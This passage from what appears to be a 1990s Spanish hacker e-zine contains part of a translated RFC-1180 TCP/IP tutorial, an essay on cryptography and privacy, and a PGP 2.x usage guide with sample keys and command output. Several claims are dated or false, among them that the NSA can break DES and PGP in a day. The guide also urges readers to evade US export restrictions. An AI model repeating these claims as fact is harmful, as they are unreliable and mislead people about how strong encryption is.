buscando una direccion igual. Una direccion es encontrada igual en la
segunda entrada (ver cuadro).

Esta entrada indica que las computadoras en la red 223.1.3 pueden ser
alcanzadas mediante el ruteador-IP devnetrouter. El modulo IP entonces
envia una tabla de translacion ARP a la direccion IP de devnetrouter y
envia el paquete IP directamente a devnetrouter a travez de la interfaz
alpha numero 1. El paquete IP sigue conteniendo la direccion IP destino
de epsilon.

El paquete IP llega a la interfaz desarrollo de la red delta y es pasado
a el modulo IP de delta. La direccion IP destino es examinada y por que
no es igual a ninguna de las direcciones propias de delta, decide pasar
el paquete IP.

El modulo IP de delta extrae la porcion de la red de la direccion destino
IP (223.1.3) y busca en su tabla de rutas por una red que sean iguales.
La tabla de rutas de delta se veria asi:

----------------------------------------------------------------
| Red directo/indirecto ruteador numero de interfaz|
----------------------------------------------------------------
| Desarrollo directo <blank> 1 |
| Fabrica directo <blank> 3 |
| Contabilidad directo <blank> 2 |
----------------------------------------------------------------
TABLA 12. Tabla de rutas de Delta

Abajo esta la tabla de rutas de delta de nuevo, en numeros.
----------------------------------------------------------------
| Red directo/indirecto ruteador numero de interfaz|
----------------------------------------------------------------
|223.1.2 directo <blank> 1 |
|223.1.3 directo <blank> 3 |
|223.1.4 directo <blank> 2 |
----------------------------------------------------------------
TABLA 13. Tabla de rutas de Delta con numeros

En la segunda entrada se encuentra la direccion IP buscada. IP envia el
paquete IP a epsilon a travez de la interfaz numero 3. El paquete IP
contiene la direccion destino de epsilon y la direccion destino Ethernet
del epsilon.

El paquete IP llega a epsilon y es pasado hacia la el modulo IP de epsilon.
La direccion IP destino es examinada y se encuentra la direccion destino,
asi que el paquete es pasado a los protocolos de la parte alta.

5.11 Sumario de Ruteo

Cuando un paquete IP viaja a travez de una larga internet tal vez pasara
por varios ruteadores-IP antes de llegar a el destino. El camino que toma
para llegar no esta determinado por una central fuente pero es el resultado
de consultar cada una de las tablas de ruteo usadas en el camino. Cada
computadora define solo el proximo brinco en el camino y se basa en esa
computadora para enviar el paquete IP a su destino.

5.12 Administrando las rutas

Mantener el correcto funcionamiento de las tablas ruteadoras en una gran
Internet es un trabajo complicado; la configuracion de una red esta siendo
modificada constantemente por los administradores de la red por distintas
razones. Errores en las tablas de ruteo bloquean la comunicacion en formas
que son tediosas de diagnosticar.

Cuando una computadora es movida de una red IP a otra, su direccion IP debe
ser cambiada. Cuando una computadora es removida de una red IP su vieja
direccion se vuelve invalida. Estos cambios requieren modificaciones
frecuentes a el archivo "HOSTS".

6. USER DATAGRAM PROTOCOL (UDP)

UDP es uno de los principales protocolos que residen en la cima de IP.
Ofrece servicio a las aplicaciones de red. Algunas aplicaciones de red
que usen UDP son: Network File System (NFS) y Simple Network Management
Protocol (SNMP). Este servicio es poco mas que una interfaz a IP.

UDP es un servicio sin conexion de entrega de datagramas que no garantiza
su llegada. UDP no mantiene una conexion de un extremo al otro con el modulo
UDP destino; solamente empuja el datagrama fuera de la red y acepta los
datagramas que llegan fuera de la red.

UDP a¤ade dos valores a lo que es dado por IP. Uno es la capacidad de
multiplexing (varias salidas para una entrada) de la informacion entre las
aplicaciones basadas en el numero de puerto. La otra es un chequeo para
ver la integridad de los datos.

6.1 Puertos

Como una computador cliente alcanza el servidor en otra computadora?

El camino en la comunicacion entre una aplicacion y UDP es a travez de
puertos UDP. Estos puertos estan numerados empezando de cero. Una
aplicacion que ofrezca un servicio (el servidor) espera por los mensajes
que llegen por un puerto especifico dedicado a ese servicio. El servidor
espera pacientemente por cualquier cliente que pida servicio.

Cuando una aplicacion envia datos a travez de UDP, llega al final como
una unidad simple. Por ejemplo, si una aplicacion hace 5 escrituras a el
puerto UDP, la aplicacion destino hara 5 lecturas de el puerto UDP. Ademas,
el tama¤o de cada escritura es igual a el tama¤o de cada leida.

UDP mantiene la barrera de el mensaje definida por la aplicacion. Nunca une
dos mensajes de aplicacion juntos, o divide una simple aplicacion en partes.

6.2 Checksum

El checksum es la capacidad de comprobar si los datos recibidos estan en
las condiciones que los datos enviados.

Un paquete IP con un encabezado IP indicando "UDP" es pasado a el modulo
UDP por IP. Cuando el modulo UDP recibe el datagrama UDP de IP examina
el Checksum UDP. Si el checksum es cero, significa que el checksum no fue
calculado por el remitente y puede ser ignorado. Esto significa, que el
modulo UDP de la computadora que envia puede o no crear checksums.

Si el checksum es valido (o cero), el puerto destino es examinado y si una
aplicacion esta esperando en ese puerto, una mensaje de aplicacion es
enviado a la aplicacion. De otra forma el datagrama UDP es descartado.

7. Protocolo del Control de Transmision

TCP ofrece un servicio diferente a UDP. TCP ofrece una conexion orientada
por una corriente de bytes, en lugar de un datagrama sin conexion. TCP
garantiza la entrega, UDP no.

TCP es usado en las aplicaciones de red que requieren la entrega
garantizada y no puede ser aburrida haciendo retransmisiones o esperas.
Las aplicaciones tipicas que mas usan TCP son File Transfer Protocol (FTP)
y TELNET. La gran reliabilidad de TCP tiene un costo, requiere mas trabajo
del CPU y ancho de banda. El funcionamiento interno de TCP es mas complicado
que esos en un modulo UDP.

Similar a UDP, las aplicaciones de red se conectan a puertos TCP.Los puertos
bien definidos estan dedicados a aplicaciones especificas. Por ejemplo, el
servidor TELNET usa el puerto 23. El cliente TELNET puede encontrar el
servidor simplemente conectandose a el puerto 23 de TCP en una computadora
especifica.

Cuando una aplicacion empieza usando TCP, el modulo TCP en la computadora
cliente y el modulo TCP en el servidor empiezan la comunicacion entre
ellas.

Como todos los protocolos de ventanas, el protocolo tiene un tama¤o de
ventana. El tama¤o de la ventana determina la cantidad de datos que
pueden ser transmitidos antes de que se reciba la se¤al de que han sido
recibidos. Para TCP, esta cantidad no se mide en segmentos TCP sino en
bytes.


Que aplicaciones de red estan disponibles?

Existen demasiadas aplicaciones de red como para listarlas. El numero esta
creciendo continuamente. Algunas aplicaciones han existido desde el
principio de la tecnologia internet como FTP y TELNET. Otras son
relativamente nuevas como X-Windows y SNMP. La siguiente lista menciona
una breve descripcion de las aplicaciones mencionadas en este tutorial.

8.1 TELNET

Telnet ofrece la capacidad de entrar (login) a un sistema remoto en TCP.
La operacion y apariencia es similar a un teclado marcando a travez de un
switch telefonico. En la linea de comandos en usuario escribe "telnet delta"
y recibe un login prompt de la computadora llamada "delta".

8.2 FTP

File Transfer Protocol (FTP), tan viejo como TELNET, tambien usa TCP y ha
tenido bastante popularidad. FTP permite copiar archivos entre computadoras.

8.5 SNMP

Simple Network Management Protocol (SNMP) usa UDP y esta dise¤ado para
ser usado por las estaciones centrales de mantenimiento. Es un factor
conocido que si se le ofrece suficiente informacion, un manager de red
puede detectar y diagnosticar problemas en la red. La estacion central
usa SNMP para recibir la informacion de otras computadoras en la red.
SNMP define el formato de los datos; es dejado a la estacion central
o manager de la red el interpretar los datos.

8.6 X-Window

El sistema X Window usa el protocolo X Window en TCP para dibujar ventanas
en una estacion de trabajo usando BITMAP. X Window es mucho mas que una
simple utilidad para dibujar ventanas; es una filosofia entera para dise¤ar
una interfaz de usuario.

9.0 Direcciones de los Autores

Theodore John Socolofsky
EMail: TEDS@SPIDER.CO.UK

Claudia Jeanne Kale
EMail: CLAUDIAK@SPIDER.CO.UK

Nota: Esta informacion fue tomada de RFC-1180.

[Editor: Espero la informacion proporcionada en este largo articulo haga
temblar de miedo a los administradores de sistemas...RareGaZz]

0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=


% % % % % % % % % % % % % % % %
% %
% Criptografia %
% y sus %
% Multiples Beneficios %
% %
% % % % % % % % % % % % % % % %

Por: KillerBot

~Cryptografia para las Masas~
-Phil Zimmerman

La criptografia consiste en la codificacion de caracteres de tal forma que
puedan ser decodificados solamente por el conocedor de la clave con la que
se codificaron los caracteres o el poseedor del hardware necesario para
des-codificar los caracteres.
En la segunda guerra mundial el ejercito Estadounidense logro descifrar los
mensajes que enviaban los submarinos a tierra logrando asi conocer sus
posiciones especificas y poder atacarlos. Despues de finalizada la guerra
los Estadounidenses vendieron las maquinas codificadoras a paises como India,
Francia, etc. conociendo asi todas las comunicaciones de esos paises.
Las agencias de todo el mundo para prevenir que Hackers logren el acceso a
informacion clasificada han encriptado sus documentos y restringido todo
tipo de encripcion que ellos no puedan descifrar. Desgraciadamente parece
que los gobiernos no desean que exista privacidad entre las comunicaciones,
usando tecnicas tan antiguas como la intervencion de telefonos hasta lo mas
nuevo que es romper algoritmos criptograficos para conocer cualquier
comunicacion por vias electronicas. La encripcion esta catalogada por el
gobierno americano como municiones por lo que es prohibida su exportacion
a menos de ser un algoritmo debil que pueda ser descifrado por ellos.

Ataque TEMPEST
~~~~~~~~~~~~~~
Los monitores que usamos comunmente en las computadoras de escritorio son
los viejos Tubos de Rayos Catodicos (CRT) a pesar de existir ahora algunos
con tecnologia mejor pero han sido descontinuados del mercado por las trabas
que el gobierno ha puesto a la imposicion de esta tecnologia. El ataque
TEMPEST consiste el leer los caracteres que aparecen en tu monitor gracias a
la emision de ondas RF que todos los monitores emiten. Esta forma de
invasion es usada algunas veces por el gobierno estadounidense para espiar
monitores y ver toda la informacion que el investigado haga aparecer en su
pantalla.
Este ataque no ha sido ampliamente difundido por la dificultad de leer otros
dispositivos como el teclado, impresora, scanners, etc. De cualquier manera
cualquier John Doe con un poco de conocimientos de electronica y sobre ondas
de radio puede crear un lector de ondas RF y leer tu monitor y en algunos
casos hasta monitorear cada tecla presionada en tu teclado.

Encripcion
~~~~~~~~~~
Ok. Ya quedo claro que el unico modo de defendernos es la encripcion pero
que tan segura es?

Si tu piensas que el mundo de los hackers esta hundido en prejuicios, apuesto
a que desearias hablar con un cripto-analista.Esta gente son tradicionalmente
los mas grandes hoyos en los que he puesto mis ojos. En su mente esta gente
ha estado debatiendo los conceptos de la encripcion desde tiempos remotos y
si tu apareces con un metodo totalmente nuevo de encripcion de datos -TU
ESTAS INSULTANDO A TODOS LOS QUE HAN HECHO ENCRIPCION-. Simplemente por decir
"Oh, Se me ocurrio una idea para encriptar que puede ser una de las mejores
hasta la fecha" cuando la gente ha dedicado toda su vida a dise¤ar y romper a
las tecnicas de encripcion -- asi que te hace pensar que eres tan brillante?
De cualquier forma, cripto-analistas tienden a aceptar todos los comentarios
como insultos y son facilmente ofendidos.

Casi todos los cripto-analistas coinciden en que el costo de horas hombre
asi como el tiempo que una supercomputadora tardaria en romper el codigo
a base de ataques de fuerza bruta haria incosteable el hecho de romper todos
los codigos de encripcion creados al hazar. Como un resultado de esto, las
regulaciones del gobierno han sido creadas.
La Agencia de Seguridad Nacional (NSA) estadounidense ha creado el algoritmo
DES (Data Encryption Standard) que es como su nombre lo dice, un estandard de
encripcion. Este metodo de encripcion es basicamente solido y toma un tiempo
largo para romperse.
DES si se puede quebrar, solo que toma un "tiempo inrazonable para quebrar".
El ataque hacia la palabra "inrazonable" continua haciendose mas fuerte cada
dia. Conectando algunas computadoras DEC'S en red y la velocidad actual de
las super-computadoras la longitud de tiempo se ha convertido en
"razonablemente" baja para quebrar un archivo encriptado con este sistema.
Obviamente DES era una iniciativa del gobierno para controlar la encripcion
y esperar que el publico se la tragara, pero las cosas no salieron como lo
esperaban y han sido quemados con criticas de todos los sectores. Su metodo
de encripcion resulto demasiado debil y su intento de invadir la privacidad
no resulto.

Metodos de Encripcion
~~~~~~~~~~~~~~~~~~~~~
El metodo convencional de encripcion se basa en un concepto muy sencillo,
encriptas con una clave y para recuperar el archivo en su forma original
haces el mismo proceso con la misma llave. Tu no revelas la clave a nadie en
que no confies y listo. Existen algunos programas que crean ciphertext y que
son considerados seguros y ademas ninguno de ellos usa el estandard DES lo
que no significa que sean imposibles de quebrar solo que no estan sometidos
a limitaciones como el maximo numeros de caracteres para contrase¤as de 8
digitos. Estos metodos son: MDC, disponible en el paquete HPACK; e IDEA,
disponible en el paquete Pretty Good Privacy -- PGP

*Grupos politicos relacionados con la privacidad y libertad*


The Electronic Frontier Foundation (EFF)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Fue fundada en Julio de 1990 para asegurar la libertad de expresion en medios
digitales, con un enfoque particular en aplicar los principios legales
contenidos en la Constitucion sobre los derechos de las comunicaciones por
computadora.

Desde el principio, EFF estaba determinada a convertirse una organizacion que
combinara expertos en lo tecnico, legal y publico, y los aplicara cada vez que
un medio de comunicacion electronico aparezca.

Computer Professionals for Social Responsibility (CPSR)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
CPSR reune profesionales en computadoras y usuarios para difundir el uso
responsable de la informacion y tecnologia e invita a todos los que usen la
tecnologia de las computadoras a participar en debates publicos. Como una
organizacion de ciudadanos preocupados, CPSR dirigira la atencion publica a
las distintas decisiones que se relacionen con las aplicaciones de la
computacion y como esas decisiones afectan a la sociedad.

Preguntas y Respuestas relacionadas con criptografia.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
P. ¨Es posible guardar secretos?
R. Entre mas grande sea una organizacion, lo dificil que sera guardar un
secreto.

P. ¨Cual es el estatus legal de PGP contra RSA?
R. No se ha remediado el conflicto entre estos dos productos. El problema es
que PGP rompio la patente de el algoritmo de encripcion que le pertenece a
RSA. El programa RIPEM usa RSAREF, que es una version rebajada de RSA.
De hecho PGP ha sido rebajado en la version actual 2.6.2 y se ha cambiado
el algoritmo RSA por RSAREF.

P. ¨Como se usan las firmas ciegas?
R. Las tarjetas de votacion, firmas digitales, dinero electronico, etc.

P. ¨Puede la Agencia de Seguridad Nacional (NSA) de Estados Unidos de America
quebrar DES & PGP?
R. Desde luego. Tardarian como un dia en quebrar una llave de 512 bits.

[ Espero que cuando mandes cartas por correo tradicional las envuelvas
con un sobre...A poco no lo haces? Si no eres delincuente, terrorista o
tienes algo que esconder entonces ¨Por que guardar cartas en sobre?
Seguramente esta pregunta se te hace tonta pero se me ha preguntado a mi
¨Por que encriptas tus mensajes?...A mi tambien me parece tonta:-) Si todos
empezamos a usar tecnicas de encripcion para nuestros mensajes podriamos
lograr que no parezca sospechoso o paranoico la persona que use encripcion.]
-Phil Zimmerman en el manual de PGP

0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=-0-=

<><><><><><><><><><><><><><>
<> Que es PGP y <>
<> Cual es su importancia <>
<><><><><><><><><><><><><><>
KillerBot

"Toda tu propiedad privada es blanco para tu enemigo
y tu enemigo somos nosotros. Somos fuerzas del caos
y la anarquia. Somos todo lo que dicen que somos y
estamos orgullosos de nosotros mismos."
-Jefferson Airplane

En 1992 aparecio en la red un programa gratuito llamado Pretty Good Privacy
que significa Muy Buena Privacidad. Mejor conocido por sus siglas en ingles,
PGP permitia codificar achivos usando un algoritmo de encripcion llamado
RSA que permitia garantizar la privacidad del mensaje y ademas asegurar que
un mensaje solo pueda ser leido por la persona a la que esta destinado.

Los mensajes enviados usando PGP solo pueden ser vistos por la persona a la
que vaya dirigido el mensaje. Ademas, para enviarte un mensaje necesitan
contar con tu llave PGP publica.

PGP funciona de esta manera: cada usuario que necesita contar con su
computadora propia ya que almacenara en su disco duro 2 llaves necesarias
para llevar a cabo la encripcion y des-encripcion de los archivos.El usuario
necesitara contar con 2 llaves propias, la secreta y publica. Obviamente la
secreta debera estar bien almacenada en un diskette por seguridad y la
publica podra ser distribuida a sus conocidos. Para el manejo de las llaves
PGP cuenta con un llavero que permite visualizar las llaves almacenadas en
los archivos SECRING.PGP -El llavero con la llave secreta- y PUBRING.PGP -El
llavero con las llaves publicas-.

Si alguna persona desea mandarte un archivo encriptado, necesitara tu llave
publica y su llave secreta. Es decir, si yo quisiera mandarte un archivo para
que solo puedas leerlo tu tendria que decirle a mi programa PGP que usara tu
llave publica para decirle a mi llave secreta como encriptar el archivo para
que puedas des-encriptarlo.
Cualquier archivo encriptado usando tu llave publica solo podra ser leido
por ti lo que es una garantia en la seguridad.

Existen programas que permiten codificar y des-codificar archivos con una
clave numerica y solo los conocedores de esa clave podran ver los archivos.
Es uno de los sistemas mas simples de encripcion y tambien uno de los mas
inseguros. Este sistema necesita una forma de comunicacion segura por la que
se pueda transmitir la clave para llevar a cabo la encripcion y la des-
encripcion. Resulta tonto necesitar una forma de comunicacion segura para
transmitir la clave ya que si se cuenta con una forma de comunicacion segura
entonces para que diablos necesitan la encripcion? Nota: El correo
electronico * NUNCA * es una forma de comunicacion segura ya que cualquier
persona que haya obtenido derechos de SUPER USUARIO puede husmear el correo
electronico de cualquier usuario de ese servidor.

DONDE CONSEGUIR PGP (Legalmente)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Por ser PGP un sistema de encripcion controlado por el gobierno americano,
ninguna persona que no resida en los Estados Unidos Americanos puede tener
una copia para su uso (pero no dejes que esto te detenga).

Pasos y requisitos para obtener PGP

1.- Tener una cuenta de correo anonima. Si no tienes ninguna cuenta de correo
anonima dirigete a WWW.HOTMAIL.COM y selecciona la opcion "Sign Up Here"

2.- Llena la informacion y selecciona tu direccion X@hotmail.com donde X es
el login que tu eligas; selecciona una contrase¤a {no uses ninguna que sea
comprometedora} y continua. Si aparece un error modifica tu Login y vuelve
a intentar.

3.- Ahora que ya tienes una direccion de e-mail anonima visita esta pagina:
http://bs.mit.edu:8001/pgp-form.html
-Contesta a todas las preguntas Y (yes)
-Deja la ultima pregunta (clave) en blanco y presiona SUBMIT
-Entraras a una pagina donde se te pregunta tu E-MAIL escribe la direccion
de la cuenta anonima que acabas de crear y presiona SUBMIT.

4.- Espera unos 10 minutos (maximo 24 horas), revisa tu e-mail en hotmail
y apunta la clave que te habra llegado de MIT.

5.- Regresa a la pagina http://bs.mit.edu:8001/pgp-form.html y contesta de
nuevo Y (yes) a las preguntas y apunta la clave que te llego a tu e-mail
en el ultimo campo. Presiona SUBMIT.

6.- Entraras a otra pagina y haz click en la version PGP seleccionando un
servidor cercano de donde estes.

Configurando PGP
~~~~~~~~~~~~~~~~
Para configurar tu copia de PGP deberas modificar el AUTOEXEC.BAT para
incluir las variables de tiempo y el path de PGP. En el siguiente ejemplo no
deberas incluir los comentarios:

SET TZ=PST8PDT <--Esto indica que use la hora de Los Angeles Ca.
SET PGPPATH=C:\PGP <--Esta variable indica donde esta instalado PGP

Una vez que hayas modificado el autoexec.bat crea un directorio en tu disco
y descomprime el archivo que contenga PGP en el directorio C:\PGP
Para ver la ayuda de el programa en espa¤ol modifica la siguiente linea de
el archivo CONFIG.TXT
ORIGINAL
Language = en
MODIFICADO
Language = es

Para poder ejecutar PGP desde cualquier directorio deberas incluir el
directorio donde se encuentra el programa a tu linea PATH= en el archivo
autoexec.bat

Re-inicializa tu computadora.

Ahora que PGP ya esta instalado en tu computadora necesitaras crear tu llave
publica y secreta para que otros pueden encriptar mensajes para ti y tu
para ellos. Para crear tu par de llaves usa el comando:

C:\> pgp -kg { Comando para la generacion de llaves }
Pretty Good Privacy 2.1 - Public-key encryption for the masses.
(c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
Date: 1993/01/18 19:53 GMT
______________________________________________________________________________
*Despues te pregunta cual sera la 'fuerza' de encripcion deseada y deberas
basarte en la siguiente tabla para decidir:

Computadora Fuerza de Encripcion Encripcion Velocidad
286 512 bits debil rapido
386 768 bits media medio
486 1024 bits super lento
______________________________________________________________________________

Pick your RSA key size:
1) 384 bits- Casual grade, fast but less secure
2) 512 bits- Commercial grade, medium speed, good security
3) 1024 bits- Military grade, very slow, highest security
Choose 1, 2, or 3, or enter desired number of bits: 3 {Fuerza Militar}
______________________________________________________________________________
*En la siguiente pregunta necesitaras escribir cual es la identificacion que
quieres que aparezca en tu llave publica, puede ser tu nombre, direccion de
correo electronico, etc.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Generating an RSA key with a 1024-bit modulus...
You need a user ID for your public key. The desired form for this
user ID is your name, followed by your E-mail address enclosed in
<angle brackets>, if you have an E-mail address.
For example: John Q. Smith <12345.6789@compuserve.com>

Enter a user ID for your public key:
RareGaZz <RareGaZz@BIGFOOT.COM>
______________________________________________________________________________
*Ahora necesitaras escribir la contrase¤a que deseas usar para poder ver los
mensajes que son encriptados para ti y para crear firmas de archivos. Deberas
escoger una contrase¤a larga y caracteres numericos y ASCII. Ejemplo:

Enter pass phrase: vivia hace 23 :-) a¤os en un rancho

Como puedes ver esta clave tiene bastantes caracteres por lo que puede ser
considerada una contrase¤a segura; ademas es facil de recordar.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
You need a pass phrase to protect your RSA secret key.
Your pass phrase can be any sentence or phrase and may have many
words, spaces, punctuation, or any other printable characters.
Enter pass phrase: { No aparece en la pantalla }
Enter same pass phrase again:{ " " " " " }
Note that key generation is a VERY lengthy process.
______________________________________________________________________________
*Ahora necesitas escribir algunos caracteres al hazar para generar tu llave.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
We need to generate 105 random bytes. This is done by measuring the
time intervals between your keystrokes. Please enter some text on your
keyboard, at least 210 nonrepeating keystrokes, until you hear the beep:
1 .*
-Enough, thank you.
...................................................++++ ........++++
Key generation completed.
______________________________________________________________________________

PGP genero 2 llaves necesarias para el proceso de encripcion y se encuentran
en los archivos SECRING.PGP y PUBRING.PGP (Llave secreta - Llave publica)

Para ver el contenido de los llaveros usa el siguiente comando:

C:\> pgp -kv {comando para ver el llavero publico}
Pretty Good Privacy 2.1 - Public-key encryption for the masses.
(c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
Date: 1993/01/18 20:19 GMT

Key ring: 'c:\pgp\pubring.pgp'
Type bits/keyID Date User ID
pub 1024/7C8C3D 1993/01/18 RareGaZz <RareGaZz@hotmail.com>
1 key(s) examined.

Ahora que ya tenemos las 2 llaves necesitaremos extraer nuestra llave publica
para que cualquier persona pueda encriptar mensajes y mandarnoslos. Para poder
hacer esto, necesitaremos mandarles nuestra llave publica por correo
electronico. Por eso, necesitaremos extraer la llave publica en formato ASCII;
esto se hace con el comando:

C:\> pgp -kxa "raregazz"
Pretty Good Privacy 2.1 - Public-key encryption for the masses
(c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
Date: 1993/01/18 20:56 GMT

Extracting from key ring: 'c:\pgp\pubring.pgp', userid "RareGaZz
<RareGaZz@BIGFOOT.COM>"

Key for user ID: RareGaZz <RareGaZz@hotmail.com>
1024-bit key, Key ID 0C975F, created 1993/01/18

Extract the above key into which file? llave {Deberas escribir un nombre}

Transport armor file: llave.asc

Key extracted to file 'llave.asc'. {Tu llave publica quedara en ese archivo}

El archivo llave.asc debe contener tu firma como el siguiente archivo:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.1

mQA9AitgcOsAAAEBgMlGLWl8rub0Ulzv3wpxI5OFLRkx3UcGCGsi/y/Qg7nR8dwI
owUy65l9XZsp0MUnFQAFEbQlT25lIER1bWIgUHVkIDwxRHVtUHVkQG1haWxydXMu
Yml0bmV0Pg==
=FZBm
-----END PGP PUBLIC KEY BLOCK-----

COMUNICACION CON PGP
~~~~~~~~~~~~~~~~~~~~
Asumamos que alguien desea comunicarse contigo usando PGP. Para eso el te
envia su llave PGP:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.1

mQCNAisuyi4AAAEEAN+cY6nUU+VIhYOqBfcc12rEMph+A7iadUi8xQJ00ANvp/iF
+ugZ+GP2ZnzA0fob9cG/MVbh+iiz3g+nbS+ZljD2uK4VyxZfu5alsbCBFbJ6Oa8K
/c/e19lzaksSlTcqTMQEae60JUkrHWpnxQMM3IqSnh3D+SbsmLBs4pFrfIw9AAUR
tCRUaGUgUmFja2V0ZWVyIDxyYWNrQGx5Y2FldW0uaGZjLmNvbT4=
=6rFE
-----END PGP PUBLIC KEY BLOCK-----

Ahora necesitas a¤adir su llave a tu llavero de llaves publicas (PUBRING.PGP)
para hacer esto usas el comando:

C:\> pgp -ka llave.asc {donde llave.asc es el nombre del archivo con la llave}
Pretty Good Privacy 2.1 - Public-key encryption for the masses.
(c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
Date: 1993/01/22 22:17 GMT

Key ring: 'c:\pgp\pubring.$01'
Type bits/keyID Date User ID
pub 384/C52715 1993/01/22 Whatever <whatever@email.address>

New key ID: C52715

Keyfile contains:
1 new key(s)
Adding key ID C52715 from file 'llave.asc' to key ring 'c:\pgp\pubring.pgp'.

Key for user ID: Whatever <whatever@email.address>
384-bit key, Key ID C52715, crated 1993/01/22
This key/userID associate is not certified.

Do you want to certify this key yourself (y/N)? N {mas sobre esto adelante}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Ahora que ya tenemos a esta persona en nuestro llavero vamos a encriptar un
archivo para el unicamente.

C:\> pgp -e file.txt Whatever {Encripta FILE.TXT para Whatever}
Pretty Good Privacy 2.1 - Public-key encryption for the masses.
(c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
Date: 1993/01/22 22:24 GMT


Recipient's public key will be used to encrypt.
Key for user ID: Whatever <whatever@email.address>
384-bit key, Key ID C52715, created 1993/01/22

WARNING: Because this public key is not certified with a trusted
signature, it is not known with high confidence that this public key
actually belongs to: "Whatever <whatever@email.address>".

Are you sure you want to use this public key (y/N)? y
------------------------------------------------------------------------------

Cuando termine de encriptar el archivo FILE.TXT se creara el archivo FILE.PGP
que solo podra ser des-encriptado por Whatever. Si deseamos encriptar un
texto y borrarlo permanentemente usamos el mismo comando pero con la letra
'w' despues de la primera opcion:
PGP -ew file.txt whatever
Para crear el mensaje y que sea posible enviarlo por un correo e-mail sin
necesidad de pegarlo a el mensaje usa la opcion -a (ASCII)
PGP -ea file.txt whatever
y se creara FILE.ASC con el mensaje PGP

Certificando llaves
~~~~~~~~~~~~~~~~~~~
Cuando quieras a¤adir una llave publica no certificada a tu llavero aparecera
el siguiente mensaje en tu pantalla:

Do you want to certify this key yourself (y/N)? N

Esto significa que no existe alguna manera de determinar que esa llave en
verdad pertenece a el usuario que te la mando. Certificar llaves significa
a¤adir tu ID a esa llave para asegurar que esa llave pertenece a esa persona.

Si tu creas tu llave PGP puedes decirle a un amigo cercano que la certifique
y te la mande de regreso para que puedas tener tu una llave certificada por
otra persona.

Firmar Documentos o Archivos
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Para verificar que un archivo no ha sido modificado es necesario crear una
firma electronica que pueda ser comparada con el archivo para saber si ha
sido alterado el archivo ya sea por una persona o virus. La ventaja de las
firmas electronicas con PGP es que nadie puede firmar un archivo o documento
con tu llave sin conocer tu clave y poseer tener tu llave secreta.

Firmar archivos Binarios
^^^^^^^^^^^^^^^^^^^^^^^^
En el siguiente ejemplo crearemos una firma de el archivo TEST.EXE que sera
firmada con la llave PGP de RareGaZz y podra ser verificada si se tiene la
llave PGP publica de RareGaZz en el llavero de la persona que trate de
verificar la firma.

pgp -sb TEST.EXE RAREGAZZ

Este comando generara un archivo llamado TEST.SIG que contiene la firma del
archivo TEST.EXE. Para verificar la firma se usa el siguiente comando:

pgp test.sig test.exe

Debera aparecer en pantalla el siguiente mensaje:
.
Good signature from user "RareGaZz <RareGaZz@Bigfoot.Com>"
Signature made 1997/01/01 12:12 GMT

Si se quiere crear una firma y que sea salvada en formato ASCII para enviarla
por correo electronico se usaria el mismo comando con la opcion -a

pgp -sba TEST.EXE RAREGAZZ

Y en lugar de crearse test.sig se creara el archivo TEST.ASC Para verificar
esta firma se haria de la misma forma que en el ejemplo pasado sustituyendo
TEST.SIG por TEST.ASC

Firmar Documentos
^^^^^^^^^^^^^^^^^
Cuando haces una participacion a una lista de correo o a un grupo de
noticias la unica forma de saber que ese mensaje fue enviado por ti es
firmandolo con tu llave secreta para que cualquiera con tu llave publica
pueda verificar que no ha sido modificado.
Supongamos que deseamos firmar el archivo TEST.TXT con la firma de RareGaZz.
Para hacer esto usariamos el comando:

PGP -sta TEST.TXT RAREGAZZ

Este comando crearia el archivo TEST.ASC que contiene el texto y ademas una
firma que sirve para verificar que no haya sido modificado. Ahora ya se
podria borrar el archivo TEST.TXT y enviar TEST.ASC

Para verificar la firma se usaria el comando:

PGP TEST.ASC

Si la persona que quiere verificar la firma tiene en su llavero la llave
publica de RareGaZz entonces si no ha sido modificado el texto aparecera
el siguiente mensaje y se creara el archivo original TEST
.
Good signature from user "RareGaZz <RareGaZz@Bigfoot.Com>"
Signature made 1997/01/01 12:12 GMT

Plaintext filename: test

-0- Paranoia Clinica -0-
~~~~~~~~~~~~~~~~~~~~~~~~
Supongamos que tu eres un narcotraficante y la privacidad es escencial en
tus comunicaciones. Actualmente existen aparatos que interceptan las
comunicaciones celulares y hasta las encriptadas son quebradas por expertos
en criptografia; las lineas telefonicas convencionales todos sabemos que
estan 'parchadas' en cada poste telefonico. Asi que ¨cual es la alternativa
para obtener privacidad por el telefono?

PGPFone
^^^^^^^
